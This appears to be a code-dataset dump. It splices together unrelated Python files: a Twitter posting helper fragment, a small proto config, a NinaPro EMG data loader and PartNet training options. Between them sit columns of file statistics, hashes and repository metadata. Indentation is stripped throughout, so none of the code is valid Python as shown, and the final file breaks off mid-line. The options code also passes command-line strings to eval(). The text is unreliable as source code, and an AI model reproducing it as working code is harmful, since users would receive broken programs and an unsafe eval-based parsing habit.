url_img = "https://upload.twitter.com/1.1/media/upload.json"
media_id = []
for i in range(len(img)):
files = {"media" : img[i]}
res_img = twitter.post(url_img, files = files)
if res_img.status_code != 200:
print("Failed to upload image : %s" % res_img.text)
return -1
media_id.append(json.loads(res_img.text)["media_id"])
if len(media_id) == 0:
params = {"status" : text}
else:
params = {"status" : text, "media_ids" : ",".join(map(str, media_id))}
params["in_reply_to_status_id"] = in_reply_to_status_id
res = twitter.post(url, params = params)
if res.status_code != 200:
print("Post tweet failed : %s" % res.text)
def icon(image):
twitter = config.twitter
url = "https://api.twitter.com/1.1/account/update_profile_image.json"
enc_img = base64.b64encode(image)
params = {"image": enc_img}
res = twitter.post(url, data = params)
if res.status_code != 200:
print("Post image failed. : %s" % res.text)
return -1
def name(name):
if type(name) != str:
name = str(name)
twitter = config.twitter
url = "https://api.twitter.com/1.1/account/update_profile.json"
params = {"name" : name}
res = twitter.post(url, params = params)
if res.status_code != 200:
print("Post name failed. : %s" % res.text)
return -1
| 25.752381
| 78
| 0.570266
| 374
| 2,704
| 3.997326
| 0.157754
| 0.046823
| 0.044147
| 0.048161
| 0.868227
| 0.835452
| 0.807358
| 0.807358
| 0.785284
| 0.785284
| 0
| 0.023736
| 0.283284
| 2,704
| 104
| 79
| 26
| 0.747678
| 0
| 0
| 0.746479
| 0
| 0
| 0.214867
| 0.007766
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056338
| false
| 0
| 0.042254
| 0
| 0.183099
| 0.112676
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3d77cb04716e6d50ee8c5b70fa6bdd5ed63bcb5
| 126
|
py
|
Python
|
src/spaceone/monitoring/conf/proto_conf.py
|
choonho/plugin-api-direct-mon-webhook
|
a5c97c410e91b4a98db3594868e6b495ec6e9f48
|
[
"Apache-2.0"
] | 1
|
2021-11-25T02:57:36.000Z
|
2021-11-25T02:57:36.000Z
|
src/spaceone/monitoring/conf/proto_conf.py
|
choonho/plugin-api-direct-mon-webhook
|
a5c97c410e91b4a98db3594868e6b495ec6e9f48
|
[
"Apache-2.0"
] | 2
|
2022-02-10T05:32:56.000Z
|
2022-03-17T12:17:20.000Z
|
src/spaceone/monitoring/conf/proto_conf.py
|
choonho/plugin-api-direct-mon-webhook
|
a5c97c410e91b4a98db3594868e6b495ec6e9f48
|
[
"Apache-2.0"
] | 3
|
2021-08-19T10:42:45.000Z
|
2021-11-23T03:02:09.000Z
|
PROTO = {
'spaceone.monitoring.api.plugin.webhook': ['Webhook'],
'spaceone.monitoring.api.plugin.event': ['Event'],
}
| 25.2
| 58
| 0.65873
| 13
| 126
| 6.384615
| 0.538462
| 0.433735
| 0.506024
| 0.650602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 126
| 4
| 59
| 31.5
| 0.754545
| 0
| 0
| 0
| 0
| 0
| 0.68254
| 0.587302
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5407cc2b2de75d9da1b27de77f6ed7330182aaf1
| 17,575
|
py
|
Python
|
expert/NinaPro/semg_repro/data.py
|
rtu715/NAS-Bench-360
|
d075006848c664371855c34082b0a00cda62be67
|
[
"MIT"
] | 10
|
2021-06-15T17:48:34.000Z
|
2022-02-23T18:34:28.000Z
|
expert/NinaPro/semg_repro/data.py
|
rtu715/NAS-Bench-360
|
d075006848c664371855c34082b0a00cda62be67
|
[
"MIT"
] | 1
|
2021-11-12T15:12:38.000Z
|
2021-11-12T19:38:00.000Z
|
expert/NinaPro/semg_repro/data.py
|
rtu715/NAS-Bench-360
|
d075006848c664371855c34082b0a00cda62be67
|
[
"MIT"
] | 1
|
2021-11-15T04:07:17.000Z
|
2021-11-15T04:07:17.000Z
|
# built in libraries
import random
import multiprocessing
# third party
import numpy as np
from scipy import signal
from scipy.io import loadmat
# local
from label_dict import label_dict
from bc_dict import bc_dict
# build window rolling scheme
def roll_labels(x, y):
labs_rolled = []
for i in range(len(y)):
l = y[i]
n = x[i].shape[0]
labs_rolled.append(np.repeat(l, n))
return np.hstack(labs_rolled)
def window_roll(a, stepsize=5, width=52):
n = a.shape[0]
emg = np.dstack([a[i : 1 + n + i - width : stepsize] for i in range(0, width)])
return emg
# build augmentation scheme
def add_noise_snr(signal, snr=25):
# convert signal to db
sgn_db = np.log10((signal ** 2).mean(axis=0)) * 10
# noise in db
noise_avg_db = sgn_db - snr
# convert noise_db
noise_variance = 10 ** (noise_avg_db / 10)
# make some white noise using this as std
noise = np.random.normal(0, np.sqrt(noise_variance), signal.shape)
return signal + noise
# noise factors to sample from, outside of the function because this will be
# called millions of times
rlist = sum([[(x / 2) % 30] * ((x // 2) % 30) for x in range(120)], [])
def add_noise_random(signal):
num = random.choice(rlist)
return add_noise_snr(signal, num)
# moving average
def moving_average(data_set, periods=3):
weights = np.ones(periods) / periods
return np.convolve(data_set, weights, mode="valid")
def ma(window, n):
return np.vstack(
[moving_average(window[:, i], n) for i in range(window.shape[-1])]
).T
def ma_batch(batch, n):
return np.dstack([ma(batch[i, :, :], n) for i in range(batch.shape[0])])
# butter filter preprocess
def _butter_highpass(cutoff, fs, order=3):
# nyquist frequency!!
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
b, a = signal.butter(order, normal_cutoff, btype="high", analog=False)
return b, a
def butter_highpass_filter(data, cutoff=2, fs=200, order=3):
b, a = _butter_highpass(cutoff=cutoff, fs=fs, order=order)
y = signal.lfilter(b, a, data)
return y
# dataset loading class:
# first some helpers:
def first0(x):
return np.unique(x)[0]
def first_appearance(arr):
# gets the first class in the case of overlapping due to our windowing
inn = [arr[i] for i in range(arr.shape[0])]
with multiprocessing.Pool(None) as p:
res = p.map(first0, inn)
return np.asarray(res)
class dataset(object):
def __init__(
self,
path,
butter=True,
rectify=True,
ma=15,
step=5,
window=52,
exercises=["a", "b", "c"],
features=None,
):
self.path = path
self.butter = butter
self.rectify = rectify
self.ma = ma
self.step = step
self.window = window
self.exercises = exercises
self.features = features
# load the data
self.read_data()
self.process_data()
def _load_file(self, path, ex, features=None):
"""
loads a file given a path, and relabels it according to the exercise dict
provided in label_dict. Each set of trials has labels starting at 0,
which needs to be corrected
"""
res = loadmat(path)
data = []
# imu data
imu = res["acc"].copy()
# repetition labeled by a machine (more accurate labels, this is what we
# will use to split the data by)
rep = res["rerepetition"].copy()
# emg data
emg = res["emg"].copy()
# machine labeled exercises
lab = res["restimulus"].copy()
# relabel 0:52
if 'a' not in self.exercises:
lab = np.array([[bc_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
else:
lab = np.array([[label_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
del res
# make it possible to engineer features
data.append(emg)
if features:
for ft in features:
print("adding features")
sameDim = data[0].shape[0] == np.shape(res[ft])[0]
newData = []
if not sameDim and np.shape(res[ft])[1] == 1:
newData = np.full((np.shape(data[0])[0], 1), res[ft][0, 0])
else:
newData = res[ft]
data.append(newData)
return np.concatenate(data, axis=1), lab, rep, imu
def _load_by_trial(self, trial=1, features=None):
data = []
labs = []
reps = []
imu = []
for i in range(1, 11):
path = f"{self.path}/s{i}/S{i}_E{trial}_A1.mat"
emg, l, r, ii = self._load_file(path, ex=trial, features=features)
data.append(emg)
labs.append(l)
reps.append(r)
imu.append(ii)
return data, labs, reps, imu
def read_data(self):
ex_dict = dict(zip(["a", "b", "c"], range(1, 4)))
self.emg = []
self.labels = []
self.repetition = []
self.imu = []
for e in self.exercises:
# In the papers the exercises are lettered not numbered, but to load
# the data properly we need them to be numbered. an exercise
# represents a group of either hand motions, funcitonal motions, or
# wrist motions
exercise = ex_dict[e]
emg, lab, rep, imu = self._load_by_trial(trial=exercise, features=self.features)
self.emg += emg
self.labels += lab
self.repetition += rep
self.imu += imu
print(sum([x.shape[0] for x in self.emg]))
def process_data(self):
if self.rectify:
self.emg = [np.abs(x) for x in self.emg]
if self.butter:
self.emg = [butter_highpass_filter(x) for x in self.emg]
self.flat = [self.emg, self.labels, self.repetition, self.imu]
self.emg = [window_roll(x, self.step, self.window) for x in self.emg]
self.imu = [window_roll(x, self.step, self.window) for x in self.imu]
self.labels = [window_roll(x, self.step, self.window) for x in self.labels]
self.repetition = [window_roll(x, self.step, self.window) for x in self.repetition]
# reshape the data to have the axes in the proper order
self.emg = np.moveaxis(np.concatenate(self.emg, axis=0), 2, 1)
self.imu = np.moveaxis(np.concatenate(self.imu, axis=0), 2, 1)
self.labels = np.moveaxis(np.concatenate(self.labels, axis=0), 2, 1)[..., -1]
self.repetition = np.moveaxis(np.concatenate(self.repetition, axis=0), 2, 1)[..., -1]
# we split by repetition, and we do not want any data leaks. So, we
# simply drop any window that has more than one repetition in it
no_leaks = np.array(
[
i
for i in range(self.repetition.shape[0])
if np.unique(self.repetition[i]).shape[0] == 1
]
)
self.emg = self.emg[no_leaks, :, :]
self.imu = self.imu[no_leaks, :, :]
self.labels = self.labels[no_leaks, :]
self.repetition = self.repetition[no_leaks, :]
# next we want to make sure there arent multiple labels. We do this
# using the first class that appears in a window. Intuitively, this
# makes sense, as when someone is grabbing something then finishes
# halfway through, they still completed the act of grabbing something
self.labels = first_appearance(self.labels)
self.repetition = first_appearance(self.repetition)
self.emg = self.emg.astype(np.float16)
self.imu = self.imu.astype(np.float16)
class nina4_dataset(dataset):
def __init__(
self,
path,
butter=True,
rectify=True,
ma=15,
step=5,
window=52,
exercises=["a", "b", "c"],
features=None,
n_subjects=10
):
self.path = path
self.n_subjects = n_subjects
self.butter = butter
self.rectify = rectify
self.ma = ma
self.step = step
self.window = window
self.exercises = exercises
self.features = features
# load the data
print("reading")
self.read_data()
print("processing")
self.process_data()
def _load_file(self, path, ex, features=None):
"""
loads a file given a path, and relabels it according to the exercise dict
provided in label_dict. Each set of trials has labels starting at 0,
which needs to be corrected
"""
res = loadmat(path)
data = []
# repetition labeled by a machine (more accurate labels, this is what we
# will use to split the data by)
rep = res["rerepetition"].copy()
# emg data
emg = res["emg"].copy()
# machine labeled exercises
lab = res["restimulus"].copy()
# relabel 0:52
lab = np.array([[label_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
del res
# make it possible to engineer features
data.append(emg)
if features:
for ft in features:
print("adding features")
sameDim = data[0].shape[0] == np.shape(res[ft])[0]
newData = []
if not sameDim and np.shape(res[ft])[1] == 1:
newData = np.full((np.shape(data[0])[0], 1), res[ft][0, 0])
else:
newData = res[ft]
data.append(newData)
return np.concatenate(data, axis=1), lab, rep
def _load_by_trial(self, trial=1, features=None):
data = []
labs = []
reps = []
for i in range(1, self.n_subjects+1):
path = f"{self.path}/s{i}/S{i}_E{trial}_A1.mat"
emg, l, r = self._load_file(path, ex=trial, features=features)
data.append(emg)
labs.append(l)
reps.append(r)
return data, labs, reps
def read_data(self):
ex_dict = dict(zip(["a", "b", "c"], range(1, 4)))
self.emg = []
self.labels = []
self.repetition = []
for e in self.exercises:
# In the papers the exercises are lettered not numbered, but to load
# the data properly we need them to be numbered. an exercise
# represents a group of either hand motions, funcitonal motions, or
# wrist motions
exercise = ex_dict[e]
emg, lab, rep = self._load_by_trial(trial=exercise, features=self.features)
self.emg += emg
self.labels += lab
self.repetition += rep
def process_data(self):
if self.rectify:
self.emg = [np.abs(x) for x in self.emg]
if self.butter:
self.emg = [butter_highpass_filter(x) for x in self.emg]
print("rolling")
self.emg = [window_roll(x, self.step, self.window) for x in self.emg]
self.labels = [window_roll(x, self.step, self.window) for x in self.labels]
self.repetition = [window_roll(x, self.step, self.window) for x in self.repetition]
# reshape the data to have the axes in the proper order
self.emg = np.moveaxis(np.concatenate(self.emg, axis=0), 2, 1)
self.labels = np.moveaxis(np.concatenate(self.labels, axis=0), 2, 1)[..., -1]
self.repetition = np.moveaxis(np.concatenate(self.repetition, axis=0), 2, 1)[..., -1]
# we split by repetition, and we do not want any data leaks. So, we
# simply drop any window that has more than one repetition in it
no_leaks = np.array(
[
i
for i in range(self.repetition.shape[0])
if np.unique(self.repetition[i]).shape[0] == 1
]
)
self.emg = self.emg[no_leaks, :, :]
self.labels = self.labels[no_leaks, :]
self.repetition = self.repetition[no_leaks, :]
# next we want to make sure there arent multiple labels. We do this
# using the first class that appears in a window. Intuitively, this
# makes sense, as when someone is grabbing something then finishes
# halfway through, they still completed the act of grabbing something
print("cleaning")
self.labels = first_appearance(self.labels)
self.repetition = first_appearance(self.repetition)
self.emg = self.emg.astype(np.float16)
class nina1_dataset(dataset):
def __init__(
self,
path,
butter=True,
rectify=True,
ma=15,
step=5,
window=52,
exercises=["a", "b", "c"],
features=None,
n_subjects=27
):
self.path = path
self.n_subjects = n_subjects
self.butter = butter
self.rectify = rectify
self.ma = ma
self.step = step
self.window = window
self.exercises = exercises
self.features = features
# load the data
print("reading")
self.read_data()
print("processing")
self.process_data()
def _load_file(self, path, ex, features=None):
"""
loads a file given a path, and relabels it according to the exercise dict
provided in label_dict. Each set of trials has labels starting at 0,
which needs to be corrected
"""
res = loadmat(path)
data = []
# repetition labeled by a machine (more accurate labels, this is what we
# will use to split the data by)
rep = res["rerepetition"].copy()
# emg data
emg = res["emg"].copy()
# machine labeled exercises
lab = res["restimulus"].copy()
# relabel 0:52
lab = np.array([[label_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
del res
# make it possible to engineer features
data.append(emg)
if features:
for ft in features:
print("adding features")
sameDim = data[0].shape[0] == np.shape(res[ft])[0]
newData = []
if not sameDim and np.shape(res[ft])[1] == 1:
newData = np.full((np.shape(data[0])[0], 1), res[ft][0, 0])
else:
newData = res[ft]
data.append(newData)
return np.concatenate(data, axis=1), lab, rep
def _load_by_trial(self, trial=1, features=None):
data = []
labs = []
reps = []
for i in range(1, self.n_subjects+1):
path = f"{self.path}/s{i}/S{i}_A1_E{trial}.mat"
emg, l, r = self._load_file(path, ex=trial, features=features)
data.append(emg)
labs.append(l)
reps.append(r)
return data, labs, reps
def read_data(self):
ex_dict = dict(zip(["a", "b", "c"], range(1, 4)))
self.emg = []
self.labels = []
self.repetition = []
for e in self.exercises:
# In the papers the exercises are lettered not numbered, but to load
# the data properly we need them to be numbered. an exercise
# represents a group of either hand motions, funcitonal motions, or
# wrist motions
exercise = ex_dict[e]
emg, lab, rep = self._load_by_trial(trial=exercise, features=self.features)
self.emg += emg
self.labels += lab
self.repetition += rep
def process_data(self):
if self.rectify:
self.emg = [np.abs(x) for x in self.emg]
if self.butter:
self.emg = [butter_highpass_filter(x) for x in self.emg]
print("rolling")
self.emg = [window_roll(x, self.step, self.window) for x in self.emg]
self.labels = [window_roll(x, self.step, self.window) for x in self.labels]
self.repetition = [window_roll(x, self.step, self.window) for x in self.repetition]
# reshape the data to have the axes in the proper order
self.emg = np.moveaxis(np.concatenate(self.emg, axis=0), 2, 1)
self.labels = np.moveaxis(np.concatenate(self.labels, axis=0), 2, 1)[..., -1]
self.repetition = np.moveaxis(np.concatenate(self.repetition, axis=0), 2, 1)[..., -1]
# we split by repetition, and we do not want any data leaks. So, we
# simply drop any window that has more than one repetition in it
no_leaks = np.array(
[
i
for i in range(self.repetition.shape[0])
if np.unique(self.repetition[i]).shape[0] == 1
]
)
self.emg = self.emg[no_leaks, :, :]
self.labels = self.labels[no_leaks, :]
self.repetition = self.repetition[no_leaks, :]
# next we want to make sure there arent multiple labels. We do this
# using the first class that appears in a window. Intuitively, this
# makes sense, as when someone is grabbing something then finishes
# halfway through, they still completed the act of grabbing something
print("cleaning")
self.labels = first_appearance(self.labels)
self.repetition = first_appearance(self.repetition)
self.emg = self.emg.astype(np.float16)
self.emg = self.emg[np.where(self.labels != 0)[0]]
self.repetition = self.repetition[np.where(self.labels != 0)[0]]
self.labels = self.labels[np.where(self.labels !=0)[0]]
self.labels -= 1
| 33.668582
| 93
| 0.571038
| 2,408
| 17,575
| 4.10299
| 0.120847
| 0.032591
| 0.010931
| 0.017206
| 0.81417
| 0.807692
| 0.804656
| 0.802328
| 0.791903
| 0.791903
| 0
| 0.016412
| 0.31357
| 17,575
| 521
| 94
| 33.733205
| 0.802553
| 0.201593
| 0
| 0.731988
| 0
| 0
| 0.023552
| 0.008019
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074928
| false
| 0.017291
| 0.020173
| 0.008646
| 0.152738
| 0.034582
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5415abad33148486dc40abb147c9e02e3c4db8c0
| 29,834
|
py
|
Python
|
Configs/partnet_options.py
|
erictuanle/GoingDeeperwPointNetworks
|
ab48e5d542289b485118ababf4716eb1686b302b
|
[
"MIT"
] | 58
|
2019-07-02T01:41:59.000Z
|
2021-03-14T07:11:20.000Z
|
Configs/partnet_options.py
|
erictuanle/GoingDeeperwPointNetworks
|
ab48e5d542289b485118ababf4716eb1686b302b
|
[
"MIT"
] | 11
|
2019-07-04T08:38:08.000Z
|
2020-11-13T12:47:15.000Z
|
Configs/partnet_options.py
|
erictuanle/GoingDeeperwPointNetworks
|
ab48e5d542289b485118ababf4716eb1686b302b
|
[
"MIT"
] | 10
|
2020-03-08T03:02:01.000Z
|
2021-02-07T02:08:25.000Z
|
import os
import torch
import argparse
from Configs.base_options import BaseOptions
#######################################################################################################################
# This script is based on the CycleGan & Pix2Pix code repository
# https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix
#######################################################################################################################
class PartnetOptions(BaseOptions):
def initialize(self, parser):
parser = BaseOptions.initialize(self, parser)
parser.add_argument('--indir', type=str, default='/mnt/Data/PartNet2/', help='input folder')
parser.add_argument('--num_classes', type=int, default=17, help='number of object categories')
parser.add_argument('--num_parts', type=int, default=251, help='number of object categories')
parser.add_argument('--num_points_training', type=int, default=10000, help='number of points to use for training')
parser.add_argument('--in_channel_x_complete', type=int, default=None, help='dimension of the features (normals, ...)')
parser.add_argument('--in_channel', type=int, default=3, help='dimension of the spatial input')
self.network = parser.parse_known_args()[0].network
if self.network == 'PointNet++':
parser = self.initialize_pointnet2(parser)
elif self.network == 'mRes':
parser = self.initialize_mRes(parser)
elif self.network == 'mResX':
parser = self.initialize_mResX(parser)
elif self.network == 'convPN':
parser = self.initialize_convPN(parser)
elif self.network == 'deepConvPN':
parser = self.initialize_deepConvPN(parser)
self.isTrain = True
return parser
def initialize_pointnet2(self, parser):
parser.add_argument('--name', type=str, default='training_pointnet2_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with Pointnet++.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[512, 128, 128], help='resolution of the point cloud at each step of the encoding (3 non increasing integers)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 64, 128],
[64, 96, 128],
[None]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball'] * 3,
['query_ball'] * 3,
[None]], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4],
[0.2, 0.4, 0.8],
[None]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding1', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[[256, 512, 1024]]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True],
[True, True, True],
[True]], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max']*3,
['max']*3,
['max']], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding2', type=lambda x: eval(x), default=[[[]]*3,
[[]]*3,
[[]]], help='kernel size of the mlp applied after the pooling at each resolution and each of the encoding steps')
parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the outout linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
return parser
def initialize_mRes(self, parser):
parser.add_argument('--name', type=str, default='training_mres_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with mRes.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64],
[128]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64],
[None]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball'],
[None]], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4],
[0.2, 0.4, 0.8],
[None]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding1', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[[256, 512, 1024]]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True],
[True, True, True],
[True]], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--cross_connection', type=lambda x: eval(x), default=[[False, False],
[False, False],
[None, None]], help='whether to use x-link at each resolution and each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max'],
['max', 'max', 'max'],
['max']], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding2', type=lambda x: eval(x), default=[[[]] * 3,
[[]] * 3,
[[]]], help='kernel size of the mlp applied after the pooling at each resolution and each of the encoding steps')
parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the outout linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--dropout_rate_cross', type=int, default=0, help='dropout rate to use for all of the crosslinks')
parser.add_argument('--nb_interpolating_points_encoding', type=lambda x: eval(x), default=[[8, 8],
[8, 8],
[None]], help='number of points to use for interpolation at each resolution and at each of the encoding steps')
parser.add_argument('--nb_interpolating_points_crossconnection', type=lambda x: eval(x), default=[[[8, 8], [8, 8]],
[[8, 8], [8, 8]],
[None]], help='number of points to use for interpolation for each crosslinks at each resolution and at each of the encoding steps')
return parser
def initialize_mResX(self, parser):
parser.add_argument('--name', type=str, default='training_mresx_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with mResX.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64],
[128]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64],
[None]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball'],
[None]], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4],
[0.2, 0.4, 0.8],
[None]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding1', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[[256, 512, 1024]]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True],
[True, True, True],
[True]], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--cross_connection', type=lambda x: eval(x), default=[[True, True],
[True, True],
[None, None]], help='whether to use x-link at each resolution and each of the encoding steps')
parser.add_argument('--pooling_operation', type=lambda x: eval(x), default=[['max', 'max', 'max'],
['max', 'max', 'max'],
['max']], help='pooling layer to use at each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding2', type=lambda x: eval(x), default=[[[]] * 3,
[[]] * 3,
[[]]], help='kernel size of the mlp applied after the pooling at each resolution and each of the encoding steps')
parser.add_argument('--intermediate_size_fc', type=lambda x: eval(x), default=[512, 256], help='dimension of the outout linear layers')
parser.add_argument('--dropout_rate', type=lambda x: eval(x), default=[0.7], help='dropout rate to use')
parser.add_argument('--weight_decay', default=5*1e-4, help='weight decay')
parser.add_argument('--nb_interpolating_points', type=lambda x: eval(x), default=[3, 3, 3], help='number of points to use for interpolation at each of the decoding steps')
parser.add_argument('--use_x_complete_unsampled', type=lambda x: eval(x), default=[True, True, True], help='whether to use skiplinks at each of the decoding steps')
parser.add_argument('--list_dim_channels_decoding', type=lambda x: eval(x), default=[[256, 256],
[256, 128],
[128, 128]], help='kernel size of the mlp applied after the pooling at each of the decoding steps')
parser.add_argument('--dropout_rate_cross', type=int, default=0, help='dropout rate to use for all of the crosslinks')
parser.add_argument('--nb_interpolating_points_encoding', type=lambda x: eval(x), default=[[8, 8],
[8, 8],
[None]], help='number of points to use for interpolation at each resolution and at each of the encoding steps')
parser.add_argument('--nb_interpolating_points_crossconnection', type=lambda x: eval(x), default=[[[8, 8], [8, 8]],
[[8, 8], [8, 8]],
[None]], help='number of points to use for interpolation for each crosslinks at each resolution and at each of the encoding steps')
return parser
def initialize_convPN(self, parser):
parser.add_argument('--name', type=str, default='training_convpn_partnet', help='training run name')
parser.add_argument('--desc', type=str, default='My training on PartNet with convPN.', help='description')
parser.add_argument('--refine', type=str, default='', help='refine model at this path')
parser.add_argument('--batch_size', type=int, default=8, help='maximum number of samples within a batch')
parser.add_argument('--nb_subsampled_points', type=lambda x: eval(x), default=[[512, 256, 128],
[128, 96, 64]], help='resolution of the point cloud at each of the encoding steps (3 non increasing lists)')
parser.add_argument('--nb_neighbours', type=lambda x: eval(x), default=[[32, 32, 32, 32],
[64, 64, 64, 64]], help='number of neighbours to consider for each resolution and each of the encoding steps')
parser.add_argument('--sampling_method', type=lambda x: eval(x), default=[['query_ball', 'query_ball', 'query_ball', 'query_ball'],
['query_ball', 'query_ball', 'query_ball', 'query_ball']], help='sampling method to use for each resolution and each of the encoding steps')
parser.add_argument('--patch_radius', type=lambda x: eval(x), default=[[0.1, 0.2, 0.4, 0.4],
[0.2, 0.4, 0.8, 0.8]], help='radius of the query ball (if chosen) for each resolution and each of the encoding steps')
parser.add_argument('--list_dim_channels_encoding', type=lambda x: eval(x), default=[[[32, 32, 64], [64, 64, 128], [64, 96, 128]],
[[64, 64, 128], [128, 128, 256], [128, 128, 256]],
[256, 512, 1024]], help='kernel size of the mlp applied before the pooling at each resolution and each of the encoding steps')
parser.add_argument('--use_x', type=lambda x: eval(x), default=[[True, True, True, True],
[True, True, True, True],
True], help='whether to use x as additional features for the linear layers at each resolution and each of the encoding steps')
parser.add_argument('--use_crosslinks', type=lambda x: eval(x), default=[False, False], help='whether to use x-link at each of the encoding steps')
parser.add_argument('--use_reslinks', type=lambda x: eval(x), default=[True, True], help='whether to use residual-link at each of the encoding steps')
parser.add_argument('--sequence', type=lambda x: eval(x), default=[['CS', 'C', 'C'],
